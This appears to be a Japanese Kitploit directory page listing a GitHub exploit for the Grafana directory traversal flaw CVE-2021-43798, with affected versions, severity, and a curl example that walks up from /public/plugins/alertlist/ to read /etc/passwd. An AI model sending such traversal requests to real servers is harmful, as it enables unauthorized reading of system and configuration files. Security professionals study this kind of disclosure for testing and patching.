Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-43798 — Grafanaディレクトリトラバーサル(CVE-2021-43798)のエクスプロイト。巧妙に細工されたHTTPリクエストを介して不正なファイル読み取りを可能にします。 | Kitploit
ツール/GitHubGitHub/shoxake17/cve-2021-43798
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubshoxake17/cve-2021-43798

CVE-2021-43798

Grafanaディレクトリトラバーサル(CVE-2021-43798)のエクスプロイト。巧妙に細工されたHTTPリクエストを介して不正なファイル読み取りを可能にします。

リポジトリを見る
25ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Privacy Hunter による CVE-2021-43798

影響を受けるバージョン: Grafana 8.0.0-beta1 から 8.3.0 まで(パッチ適用済みバージョンは除く)

脆弱性の種類: Directory Traversal(ディレクトリトラバーサル)

影響度: 非常に危険(Critical)

プラットフォーム: Grafana(オープンソースの監視および可観測性プラットフォーム)

⚠️ 脆弱性の詳細 Grafana では、次の URL を介してディレクトリトラバーサルを実行できます:

コード http://<grafana_host>/public/plugins// これにより、攻撃者はサーバー上のローカルファイルを読み取ることができます。例: /etc/passwd や設定ファイルへの不正アクセス。

🔥 エクスプロイトの例 簡単なリクエストでファイルを読み取る:

bash curl http://target:3000/public/plugins/alertlist/../../../../../../../../etc/passwd 上記のリクエストにより、Linux システムのユーザー一覧を取得できます。

ツールをダウンロード